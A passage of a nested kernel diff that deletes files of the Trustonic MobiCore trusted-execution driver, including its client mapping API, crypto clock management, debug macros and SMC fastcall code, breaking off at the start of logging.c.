-- if (!is_valid_device(device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_free_cbuf(client, va));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_free_wsm);
--
--enum mc_result mc_map(struct mc_session_handle *session, void *address,
-- uint32_t length, struct mc_bulk_map *map_info)
--{
-- enum mc_result ret;
-- struct mc_ioctl_buffer bufs[MC_MAP_MAX];
-- uint32_t i;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!map_info)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- bufs[0].va = (uintptr_t)address;
-- bufs[0].len = length;
-- for (i = 1; i < MC_MAP_MAX; i++)
-- bufs[i].va = 0;
--
-- ret = convert(api_map_wsms(client, session->session_id, bufs));
-- if (ret == MC_DRV_OK) {
-- map_info->secure_virt_addr = bufs[0].sva;
-- map_info->secure_virt_len = bufs[0].len;
-- }
--
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_map);
--
--enum mc_result mc_unmap(struct mc_session_handle *session, void *address,
-- struct mc_bulk_map *map_info)
--{
-- enum mc_result ret;
-- struct mc_ioctl_buffer bufs[MC_MAP_MAX];
-- uint32_t i;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!map_info)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- bufs[0].va = (uintptr_t)address;
-- bufs[0].len = map_info->secure_virt_len;
-- bufs[0].sva = map_info->secure_virt_addr;
-- for (i = 1; i < MC_MAP_MAX; i++)
-- bufs[i].va = 0;
--
-- ret = convert(api_unmap_wsms(client, session->session_id, bufs));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_unmap);
--
--enum mc_result mc_get_session_error_code(struct mc_session_handle *session,
-- int32_t *exit_code)
--{
-- enum mc_result ret;
--
-- /* Check parameters */
-- if (!session)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!is_valid_device(session->device_id))
-- return MC_DRV_ERR_UNKNOWN_DEVICE;
--
-- if (!exit_code)
-- return MC_DRV_ERR_INVALID_PARAMETER;
--
-- if (!clientlib_client_get())
-- return MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN;
--
-- /* Call core api */
-- ret = convert(api_get_session_exitcode(client, session->session_id,
-- exit_code));
-- clientlib_client_put();
-- return ret;
--}
--EXPORT_SYMBOL(mc_get_session_error_code);
-diff --git a/drivers/gud/MobiCoreDriver/clock.c b/drivers/gud/MobiCoreDriver/clock.c
-deleted file mode 100644
-index 0195ab794f205..0000000000000
---- a/drivers/gud/MobiCoreDriver/clock.c
-+++ /dev/null
-@@ -1,161 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include "platform.h"
--
--#ifdef MC_CRYPTO_CLOCK_MANAGEMENT
--
--#include
--#include
--#include
--#include
--
--#include "debug.h"
--#include "clock.h"
--
--static struct clk_context {
-- struct clk *mc_ce_iface_clk;
-- struct clk *mc_ce_core_clk;
-- struct clk *mc_ce_bus_clk;
-- struct clk *mc_ce_core_src_clk;
--} clk_ctx;
--
--int mc_clock_init(void)
--{
-- int ret = 0;
--#ifdef MC_CLOCK_CORESRC_DEFAULTRATE
-- int core_src_rate = MC_CLOCK_CORESRC_DEFAULTRATE;
--
-- /* Get core clk src */
-- clk_ctx.mc_ce_core_src_clk = clk_get(g_ctx.mcd, "core_clk_src");
-- if (IS_ERR(clk_ctx.mc_ce_core_src_clk)) {
-- ret = PTR_ERR(clk_ctx.mc_ce_core_src_clk);
-- MCDRV_ERROR("cannot get core src clock: %d", ret);
-- goto error;
-- }
--
--#ifdef MC_CRYPTO_CLOCK_CORESRC_PROPNAME
-- if (of_property_read_u32(g_ctx.mcd->of_node,
-- MC_CRYPTO_CLOCK_CORESRC_PROPNAME,
-- &core_src_rate)) {
-- core_src_rate = MC_CLOCK_CORESRC_DEFAULTRATE;
-- MCDRV_ERROR("cannot get ce clock frequency from DT, use %d",
-- core_src_rate);
-- }
--#endif /* MC_CRYPTO_CLOCK_CORESRC_PROPNAME */
--
-- ret = clk_set_rate(clk_ctx.mc_ce_core_src_clk, core_src_rate);
-- if (ret) {
-- clk_put(clk_ctx.mc_ce_core_src_clk);
-- clk_ctx.mc_ce_core_src_clk = NULL;
-- MCDRV_ERROR("cannot set core clock src rate: %d", ret);
-- ret = -EIO;
-- goto error;
-- }
--#endif /* MC_CLOCK_CORESRC_DEFAULTRATE */
--
-- /* Get core clk */
-- clk_ctx.mc_ce_core_clk = clk_get(g_ctx.mcd, "core_clk");
-- if (IS_ERR(clk_ctx.mc_ce_core_clk)) {
-- ret = PTR_ERR(clk_ctx.mc_ce_core_clk);
-- MCDRV_ERROR("cannot get core clock: %d", ret);
-- goto error;
-- }
-- /* Get Interface clk */
-- clk_ctx.mc_ce_iface_clk = clk_get(g_ctx.mcd, "iface_clk");
-- if (IS_ERR(clk_ctx.mc_ce_iface_clk)) {
-- clk_put(clk_ctx.mc_ce_core_clk);
-- ret = PTR_ERR(clk_ctx.mc_ce_iface_clk);
-- MCDRV_ERROR("cannot get iface clock: %d", ret);
-- goto error;
-- }
-- /* Get AXI clk */
-- clk_ctx.mc_ce_bus_clk = clk_get(g_ctx.mcd, "bus_clk");
-- if (IS_ERR(clk_ctx.mc_ce_bus_clk)) {
-- clk_put(clk_ctx.mc_ce_iface_clk);
-- clk_put(clk_ctx.mc_ce_core_clk);
-- ret = PTR_ERR(clk_ctx.mc_ce_bus_clk);
-- MCDRV_ERROR("cannot get AXI bus clock: %d", ret);
-- goto error;
-- }
-- return ret;
--
--error:
-- clk_ctx.mc_ce_core_clk = NULL;
-- clk_ctx.mc_ce_iface_clk = NULL;
-- clk_ctx.mc_ce_bus_clk = NULL;
-- clk_ctx.mc_ce_core_src_clk = NULL;
-- return ret;
--}
--
--void mc_clock_exit(void)
--{
-- if (clk_ctx.mc_ce_iface_clk)
-- clk_put(clk_ctx.mc_ce_iface_clk);
--
-- if (clk_ctx.mc_ce_core_clk)
-- clk_put(clk_ctx.mc_ce_core_clk);
--
-- if (clk_ctx.mc_ce_bus_clk)
-- clk_put(clk_ctx.mc_ce_bus_clk);
--
-- if (clk_ctx.mc_ce_core_src_clk)
-- clk_put(clk_ctx.mc_ce_core_src_clk);
--}
--
--int mc_clock_enable(void)
--{
-- int rc;
--
-- rc = clk_prepare_enable(clk_ctx.mc_ce_core_clk);
-- if (rc) {
-- MCDRV_ERROR("cannot enable core clock");
-- goto err_core;
-- }
--
-- rc = clk_prepare_enable(clk_ctx.mc_ce_iface_clk);
-- if (rc) {
-- MCDRV_ERROR("cannot enable interface clock");
-- goto err_iface;
-- }
--
-- rc = clk_prepare_enable(clk_ctx.mc_ce_bus_clk);
-- if (rc) {
-- MCDRV_ERROR("cannot enable bus clock");
-- goto err_bus;
-- }
--
-- return 0;
--
--err_bus:
-- clk_disable_unprepare(clk_ctx.mc_ce_iface_clk);
--err_iface:
-- clk_disable_unprepare(clk_ctx.mc_ce_core_clk);
--err_core:
-- return rc;
--}
--
--void mc_clock_disable(void)
--{
-- if (clk_ctx.mc_ce_iface_clk)
-- clk_disable_unprepare(clk_ctx.mc_ce_iface_clk);
--
-- if (clk_ctx.mc_ce_core_clk)
-- clk_disable_unprepare(clk_ctx.mc_ce_core_clk);
--
-- if (clk_ctx.mc_ce_bus_clk)
-- clk_disable_unprepare(clk_ctx.mc_ce_bus_clk);
--}
--
--#endif /* MC_CRYPTO_CLOCK_MANAGEMENT */
-diff --git a/drivers/gud/MobiCoreDriver/clock.h b/drivers/gud/MobiCoreDriver/clock.h
-deleted file mode 100644
-index 21095499efb53..0000000000000
---- a/drivers/gud/MobiCoreDriver/clock.h
-+++ /dev/null
-@@ -1,53 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_CLOCK_H_
--#define _MC_CLOCK_H_
--
--#include "platform.h" /* MC_CRYPTO_CLOCK_MANAGEMENT */
--
--#ifdef MC_CRYPTO_CLOCK_MANAGEMENT
--
--/* Initialize secure crypto clocks */
--int mc_clock_init(void);
--/* Free secure crypto clocks */
--void mc_clock_exit(void);
--/* Enable secure crypto clocks */
--int mc_clock_enable(void);
--/* Disable secure crypto clocks */
--void mc_clock_disable(void);
--
--#else /* MC_CRYPTO_CLOCK_MANAGEMENT */
--
--static inline int mc_clock_init(void)
--{
-- return 0;
--}
--
--static inline void mc_clock_exit(void)
--{
--}
--
--static inline int mc_clock_enable(void)
--{
-- return 0;
--}
--
--static inline void mc_clock_disable(void)
--{
--}
--
--#endif /* !MC_CRYPTO_CLOCK_MANAGEMENT */
--
--#endif /* _MC_CLOCK_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/debug.h b/drivers/gud/MobiCoreDriver/debug.h
-deleted file mode 100644
-index 9d6a52ab955b6..0000000000000
---- a/drivers/gud/MobiCoreDriver/debug.h
-+++ /dev/null
-@@ -1,63 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_DEBUG_H_
--#define _MC_DEBUG_H_
--
--#include "main.h" /* g_ctx */
--
--#define MCDRV_ERROR(txt, ...) \
-- dev_err(g_ctx.mcd, "%s() ### ERROR: " txt "\n", \
-- __func__, \
-- ##__VA_ARGS__)
--
--/* dummy function helper macro. */
--#define DUMMY_FUNCTION() do {} while (0)
--
--#ifdef DEBUG
--
--#ifdef DEBUG_VERBOSE
--#define MCDRV_DBG_VERBOSE MCDRV_DBG
--#else
--#define MCDRV_DBG_VERBOSE(...) DUMMY_FUNCTION()
--#endif
--
--#define MCDRV_DBG(txt, ...) \
-- dev_info(g_ctx.mcd, "%s(): " txt "\n", \
-- __func__, \
-- ##__VA_ARGS__)
--
--#define MCDRV_DBG_WARN(txt, ...) \
-- dev_warn(g_ctx.mcd, "%s() WARNING: " txt "\n", \
-- __func__, \
-- ##__VA_ARGS__)
--
--#define MCDRV_ASSERT(cond) \
-- do { \
-- if (unlikely(!(cond))) { \
-- panic("Assertion failed: %s:%d\n", \
-- __FILE__, __LINE__); \
-- } \
-- } while (0)
--
--#else /* DEBUG */
--
--#define MCDRV_DBG_VERBOSE(...) DUMMY_FUNCTION()
--#define MCDRV_DBG(...) DUMMY_FUNCTION()
--#define MCDRV_DBG_WARN(...) DUMMY_FUNCTION()
--
--#define MCDRV_ASSERT(...) DUMMY_FUNCTION()
--
--#endif /* !DEBUG */
--
--#endif /* _MC_DEBUG_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/fastcall.c b/drivers/gud/MobiCoreDriver/fastcall.c
-deleted file mode 100644
-index ee612632331c8..0000000000000
---- a/drivers/gud/MobiCoreDriver/fastcall.c
-+++ /dev/null
-@@ -1,512 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include
--#include
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--#include "public/mc_linux_api.h"
--
--#include "mci/mcifc.h"
--
--#include "platform.h" /* MC_FASTCALL_WORKER_THREAD and more */
--#include "debug.h"
--#include "clock.h" /* mc_clock_enable, mc_clock_disable */
--#include "fastcall.h"
--
--struct fastcall_work {
--#ifdef MC_FASTCALL_WORKER_THREAD
-- struct kthread_work work;
--#else
-- struct work_struct work;
--#endif
-- void *data;
--};
--
--/* generic fast call parameters */
--union mc_fc_generic {
-- struct {
-- uint32_t cmd;
-- uint32_t param[3];
-- } as_in;
-- struct {
-- uint32_t resp;
-- uint32_t ret;
-- uint32_t param[2];
-- } as_out;
--};
--
--/* fast call init */
--union mc_fc_init {
-- union mc_fc_generic as_generic;
-- struct {
-- uint32_t cmd;
-- uint32_t base;
-- uint32_t nq_info;
-- uint32_t mcp_info;
-- } as_in;
-- struct {
-- uint32_t resp;
-- uint32_t ret;
-- uint32_t rfu[2];
-- } as_out;
--};
--
--/* fast call info parameters */
--union mc_fc_info {
-- union mc_fc_generic as_generic;
-- struct {
-- uint32_t cmd;
-- uint32_t ext_info_id;
-- uint32_t rfu[2];
-- } as_in;
-- struct {
-- uint32_t resp;
-- uint32_t ret;
-- uint32_t state;
-- uint32_t ext_info;
-- } as_out;
--};
--
--#ifdef TBASE_CORE_SWITCHER
--/* fast call switch Core parameters */
--union mc_fc_swich_core {
-- union mc_fc_generic as_generic;
-- struct {
-- uint32_t cmd;
-- uint32_t core_id;
-- uint32_t rfu[2];
-- } as_in;
-- struct {
-- uint32_t resp;
-- uint32_t ret;
-- uint32_t state;
-- uint32_t ext_info;
-- } as_out;
--};
--#endif
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static struct task_struct *fastcall_thread;
--static DEFINE_KTHREAD_WORKER(fastcall_worker);
--#endif
--
--/*
-- * _smc() - fast call to MobiCore
-- *
-- * @data: pointer to fast call data
-- */
--static inline int _smc(union mc_fc_generic *mc_fc_generic)
--{
-- if (!mc_fc_generic)
-- return -EINVAL;
--
--#ifdef MC_SMC_FASTCALL
-- return smc_fastcall(mc_fc_generic, sizeof(*mc_fc_generic));
--#else /* MC_SMC_FASTCALL */
-- {
--#ifdef CONFIG_ARM64
-- /* SMC expect values in x0-x3 */
-- register u64 reg0 __asm__("x0") = mc_fc_generic->as_in.cmd;
-- register u64 reg1 __asm__("x1") = mc_fc_generic->as_in.param[0];
-- register u64 reg2 __asm__("x2") = mc_fc_generic->as_in.param[1];
-- register u64 reg3 __asm__("x3") = mc_fc_generic->as_in.param[2];
--
-- /*
-- * According to AARCH64 SMC Calling Convention (ARM DEN 0028A),
-- * section 3.1: registers x4-x17 are unpredictable/scratch
-- * registers. So we have to make sure that the compiler does
-- * not allocate any of those registers by letting him know that
-- * the asm code might clobber them.
-- */
-- __asm__ volatile (
-- "smc #0\n"
-- : "+r"(reg0), "+r"(reg1), "+r"(reg2), "+r"(reg3)
-- :
-- : "x4", "x5", "x6", "x7", "x8", "x9", "x10", "x11",
-- "x12", "x13", "x14", "x15", "x16", "x17"
-- );
--#else /* CONFIG_ARM64 */
-- /* SMC expect values in r0-r3 */
-- register u32 reg0 __asm__("r0") = mc_fc_generic->as_in.cmd;
-- register u32 reg1 __asm__("r1") = mc_fc_generic->as_in.param[0];
-- register u32 reg2 __asm__("r2") = mc_fc_generic->as_in.param[1];
-- register u32 reg3 __asm__("r3") = mc_fc_generic->as_in.param[2];
--
-- __asm__ volatile (
--#ifdef MC_ARCH_EXTENSION_SEC
-- /* This pseudo op is supported and required from
-- * binutils 2.21 on */
-- ".arch_extension sec\n"
--#endif /* MC_ARCH_EXTENSION_SEC */
-- "smc #0\n"
-- : "+r"(reg0), "+r"(reg1), "+r"(reg2), "+r"(reg3)
-- );
--
--#ifdef __ARM_VE_A9X4_QEMU__
-- /* Qemu does not return to the address following the SMC
-- * instruction so we have to insert several nop instructions to
-- * workaround this Qemu bug. */
-- __asm__ volatile (
-- "nop\n"
-- "nop\n"
-- "nop\n"
-- "nop"
-- );
--#endif /* __ARM_VE_A9X4_QEMU__ */
--#endif /* !CONFIG_ARM64 */
--
-- /* set response */
-- mc_fc_generic->as_out.resp = reg0;
-- mc_fc_generic->as_out.ret = reg1;
-- mc_fc_generic->as_out.param[0] = reg2;
-- mc_fc_generic->as_out.param[1] = reg3;
-- }
-- return 0;
--#endif /* !MC_SMC_FASTCALL */
--}
--
--#ifdef TBASE_CORE_SWITCHER
--static uint32_t active_cpu;
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static void mc_cpu_offline(int cpu)
--{
-- int i;
--
-- if (active_cpu != cpu) {
-- MCDRV_DBG("not active CPU, no action taken\n");
-- return;
-- }
--
-- /* Chose the first online CPU and switch! */
-- for_each_online_cpu(i) {
-- if (cpu != i) {
-- MCDRV_DBG("CPU %d is dying, switching to %d\n", cpu, i);
-- mc_switch_core(i);
-- break;
-- }
--
-- MCDRV_DBG("Skipping CPU %d\n", cpu);
-- }
--}
--
--static int mobicore_cpu_callback(struct notifier_block *nfb,
-- unsigned long action, void *hcpu)
--{
-- unsigned int cpu = (unsigned long)hcpu;
--
-- switch (action) {
-- case CPU_DOWN_PREPARE:
-- case CPU_DOWN_PREPARE_FROZEN:
-- dev_info(g_ctx.mcd, "Cpu %u is going to die\n", cpu);
-- mc_cpu_offline(cpu);
-- break;
-- case CPU_DEAD:
-- case CPU_DEAD_FROZEN:
-- dev_info(g_ctx.mcd, "Cpu %u is dead\n", cpu);
-- break;
-- }
-- return NOTIFY_OK;
--}
--
--static struct notifier_block mobicore_cpu_notifer = {
-- .notifier_call = mobicore_cpu_callback,
--};
--#endif /* MC_FASTCALL_WORKER_THREAD */
--
--static cpumask_t mc_exec_core_switch(union mc_fc_generic *mc_fc_generic)
--{
-- cpumask_t cpu;
-- uint32_t new_cpu;
-- uint32_t cpu_id[] = CPU_IDS;
--
-- new_cpu = mc_fc_generic->as_in.param[0];
-- mc_fc_generic->as_in.param[0] = cpu_id[mc_fc_generic->as_in.param[0]];
--
-- if (_smc(mc_fc_generic) != 0 || mc_fc_generic->as_out.ret != 0) {
-- MCDRV_DBG("CoreSwap failed %d -> %d (cpu %d still active)\n",
-- raw_smp_processor_id(),
-- mc_fc_generic->as_in.param[0],
-- raw_smp_processor_id());
-- } else {
-- active_cpu = new_cpu;
-- MCDRV_DBG("CoreSwap ok %d -> %d\n",
-- raw_smp_processor_id(), active_cpu);
-- }
-- cpumask_clear(&cpu);
-- cpumask_set_cpu(active_cpu, &cpu);
-- return cpu;
--}
--#else /* TBASE_CORE_SWITCHER */
--static inline cpumask_t mc_exec_core_switch(union mc_fc_generic *mc_fc_generic)
--{
-- return CPU_MASK_CPU0;
--}
--#endif /* !TBASE_CORE_SWITCHER */
--
--#ifdef MC_FASTCALL_WORKER_THREAD
--static void fastcall_work_func(struct kthread_work *work)
--#else
--static void fastcall_work_func(struct work_struct *work)
--#endif
--{
-- struct fastcall_work *fc_work =
-- container_of(work, struct fastcall_work, work);
-- union mc_fc_generic *mc_fc_generic = fc_work->data;
--
-- if (!mc_fc_generic)
-- return;
--
-- mc_clock_enable();
--
-- if (mc_fc_generic->as_in.cmd == MC_FC_SWAP_CPU) {
--#ifdef MC_FASTCALL_WORKER_THREAD
-- cpumask_t new_msk = mc_exec_core_switch(mc_fc_generic);
--
-- set_cpus_allowed(fastcall_thread, new_msk);
--#else
-- mc_exec_core_switch(mc_fc_generic);
--#endif
-- } else {
-- _smc(mc_fc_generic);
-- }
--
-- mc_clock_disable();
--}
--
--static bool mc_fastcall(void *data)
--{
--#ifdef MC_FASTCALL_WORKER_THREAD
-- struct fastcall_work fc_work = {
-- KTHREAD_WORK_INIT(fc_work.work, fastcall_work_func),
-- .data = data,
-- };
--
-- if (!queue_kthread_work(&fastcall_worker, &fc_work.work))
-- return false;
--
-- /* If work is queued or executing, wait for it to finish execution */
-- flush_kthread_work(&fc_work.work);
--#else
-- struct fastcall_work fc_work = {
-- .data = data,
-- };
--
-- INIT_WORK_ONSTACK(&fc_work.work, fastcall_work_func);
--
-- if (!schedule_work_on(0, &fc_work.work))
-- return false;
--
-- flush_work(&fc_work.work);
--#endif
-- return true;
--}
--
--int mc_fastcall_init(void)
--{
-- int ret = mc_clock_init();
--
-- if (ret)
-- return ret;
--
--#ifdef MC_FASTCALL_WORKER_THREAD
-- fastcall_thread = kthread_create(kthread_worker_fn, &fastcall_worker,
-- "mc_fastcall");
-- if (IS_ERR(fastcall_thread)) {
-- ret = PTR_ERR(fastcall_thread);
-- fastcall_thread = NULL;
-- MCDRV_ERROR("cannot create fastcall wq (%d)", ret);
-- return ret;
-- }
--
-- /* this thread MUST run on CPU 0 at startup */
-- set_cpus_allowed(fastcall_thread, CPU_MASK_CPU0);
--
-- wake_up_process(fastcall_thread);
--#ifdef TBASE_CORE_SWITCHER
-- ret = register_cpu_notifier(&mobicore_cpu_notifer);
--#endif
--#endif /* MC_FASTCALL_WORKER_THREAD */
-- return ret;
--}
--
--void mc_fastcall_exit(void)
--{
--#ifdef MC_FASTCALL_WORKER_THREAD
-- if (!IS_ERR_OR_NULL(fastcall_thread)) {
--#ifdef TBASE_CORE_SWITCHER
-- unregister_cpu_notifier(&mobicore_cpu_notifer);
--#endif
-- kthread_stop(fastcall_thread);
-- fastcall_thread = NULL;
-- }
--#endif /* MC_FASTCALL_WORKER_THREAD */
-- mc_clock_exit();
--}
--
--/*
-- * convert fast call return code to linux driver module error code
-- */
--static int convert_fc_ret(uint32_t ret)
--{
-- switch (ret) {
-- case MC_FC_RET_OK:
-- return 0;
-- case MC_FC_RET_ERR_INVALID:
-- return -EINVAL;
-- case MC_FC_RET_ERR_ALREADY_INITIALIZED:
-- return -EBUSY;
-- default:
-- return -EFAULT;
-- }
--}
--
--int mc_fc_init(uintptr_t base_pa, ptrdiff_t off, size_t q_len, size_t buf_len)
--{
--#ifdef CONFIG_ARM64
-- uint32_t base_high = (uint32_t)(base_pa >> 32);
--#else
-- uint32_t base_high = 0;
--#endif
-- union mc_fc_init fc_init;
--
-- /* Call the INIT fastcall to setup MobiCore initialization */
-- memset(&fc_init, 0, sizeof(fc_init));
-- fc_init.as_in.cmd = MC_FC_INIT;
-- /* base address of mci buffer PAGE_SIZE (default is 4KB) aligned */
-- fc_init.as_in.base = (uint32_t)base_pa;
-- /* notification buffer start/length [16:16] [start, length] */
-- fc_init.as_in.nq_info =
-- ((base_high & 0xFFFF) << 16) | (q_len & 0xFFFF);
-- /* mcp buffer start/length [16:16] [start, length] */
-- fc_init.as_in.mcp_info = (off << 16) | (buf_len & 0xFFFF);
-- MCDRV_DBG("cmd=0x%08x, base=0x%08x,nq_info=0x%08x, mcp_info=0x%08x",
-- fc_init.as_in.cmd, fc_init.as_in.base, fc_init.as_in.nq_info,
-- fc_init.as_in.mcp_info);
-- mc_fastcall(&fc_init.as_generic);
-- MCDRV_DBG("out cmd=0x%08x, ret=0x%08x", fc_init.as_out.resp,
-- fc_init.as_out.ret);
-- return convert_fc_ret(fc_init.as_out.ret);
--}
--
--int mc_fc_info(uint32_t ext_info_id, uint32_t *state, uint32_t *ext_info)
--{
-- union mc_fc_info fc_info;
-- int ret = 0;
--
-- memset(&fc_info, 0, sizeof(fc_info));
-- fc_info.as_in.cmd = MC_FC_INFO;
-- fc_info.as_in.ext_info_id = ext_info_id;
-- mc_fastcall(&fc_info.as_generic);
-- ret = convert_fc_ret(fc_info.as_out.ret);
-- if (ret) {
-- if (state)
-- *state = MC_STATUS_NOT_INITIALIZED;
--
-- if (ext_info)
-- *ext_info = 0;
--
-- MCDRV_ERROR("code %d for idx %d", ret, ext_info_id);
-- } else {
-- if (state)
-- *state = fc_info.as_out.state;
--
-- if (ext_info)
-- *ext_info = fc_info.as_out.ext_info;
-- }
--
-- return ret;
--}
--
--int mc_fc_mem_trace(phys_addr_t buffer, uint32_t size)
--{
-- union mc_fc_generic mc_fc_generic;
--
-- memset(&mc_fc_generic, 0, sizeof(mc_fc_generic));
-- mc_fc_generic.as_in.cmd = MC_FC_MEM_TRACE;
-- mc_fc_generic.as_in.param[0] = (uint32_t)buffer;
--#ifdef CONFIG_ARM64
-- mc_fc_generic.as_in.param[1] = (uint32_t)(buffer >> 32);
--#endif
-- mc_fc_generic.as_in.param[2] = size;
-- mc_fastcall(&mc_fc_generic);
-- return convert_fc_ret(mc_fc_generic.as_out.ret);
--}
--
--int mc_fc_nsiq(void)
--{
-- union mc_fc_generic fc;
-- int ret;
--
-- memset(&fc, 0, sizeof(fc));
-- fc.as_in.cmd = MC_SMC_N_SIQ;
-- mc_fastcall(&fc);
-- ret = convert_fc_ret(fc.as_out.ret);
-- if (ret)
-- MCDRV_ERROR("failed: %d", ret);
--
-- return ret;
--}
--
--int mc_fc_yield(void)
--{
-- union mc_fc_generic fc;
-- int ret;
--
-- memset(&fc, 0, sizeof(fc));
-- fc.as_in.cmd = MC_SMC_N_YIELD;
-- mc_fastcall(&fc);
-- ret = convert_fc_ret(fc.as_out.ret);
-- if (ret)
-- MCDRV_ERROR("failed: %d", ret);
--
-- return ret;
--}
--
--#ifdef TBASE_CORE_SWITCHER
--uint32_t mc_active_core(void)
--{
-- return active_cpu;
--}
--
--int mc_switch_core(uint32_t core_num)
--{
-- int32_t ret = 0;
-- union mc_fc_swich_core fc_switch_core;
--
-- if (!cpu_online(core_num))
-- return 1;
--
-- MCDRV_DBG_VERBOSE("enter\n");
-- memset(&fc_switch_core, 0, sizeof(fc_switch_core));
-- fc_switch_core.as_in.cmd = MC_FC_SWAP_CPU;
-- if (core_num < COUNT_OF_CPUS)
-- fc_switch_core.as_in.core_id = core_num;
-- else
-- fc_switch_core.as_in.core_id = 0;
--
-- MCDRV_DBG("<- cmd=0x%08x, core_id=0x%08x\n",
-- fc_switch_core.as_in.cmd, fc_switch_core.as_in.core_id);
-- MCDRV_DBG("<- core_num=0x%08x, active_cpu=0x%08x\n",
-- core_num, active_cpu);
-- mc_fastcall(&fc_switch_core.as_generic);
-- ret = convert_fc_ret(fc_switch_core.as_out.ret);
-- MCDRV_DBG_VERBOSE("exit with %d/0x%08X\n", ret, ret);
-- return ret;
--}
--#endif
-diff --git a/drivers/gud/MobiCoreDriver/fastcall.h b/drivers/gud/MobiCoreDriver/fastcall.h
-deleted file mode 100644
-index b19b27687ff38..0000000000000
---- a/drivers/gud/MobiCoreDriver/fastcall.h
-+++ /dev/null
-@@ -1,38 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _TBASE_FASTCALL_H_
--#define _TBASE_FASTCALL_H_
--
--/* Use the arch_extension sec pseudo op before switching to secure world */
--#if defined(__GNUC__) && \
-- defined(__GNUC_MINOR__) && \
-- defined(__GNUC_PATCHLEVEL__) && \
-- ((__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__)) \
-- >= 40502
--#ifndef CONFIG_ARM64
--#define MC_ARCH_EXTENSION_SEC
--#endif
--#endif
--
--int mc_fc_init(uintptr_t base_pa, ptrdiff_t off, size_t q_len, size_t buf_len);
--int mc_fc_info(uint32_t ext_info_id, uint32_t *state, uint32_t *ext_info);
--int mc_fc_mem_trace(phys_addr_t buffer, uint32_t size);
--int mc_fc_nsiq(void);
--int mc_fc_yield(void);
--
--int mc_fastcall_init(void);
--void mc_fastcall_exit(void);
--
--#endif /* _TBASE_FASTCALL_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/logging.c b/drivers/gud/MobiCoreDriver/logging.c
-deleted file mode 100644
-index 953de5f149f78..0000000000000
---- a/drivers/gud/MobiCoreDriver/logging.c
-+++ /dev/null
-@@ -1,251 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include
--#include
--#include
--
--#include "fastcall.h"
--#include "main.h"
--#include "logging.h"
--
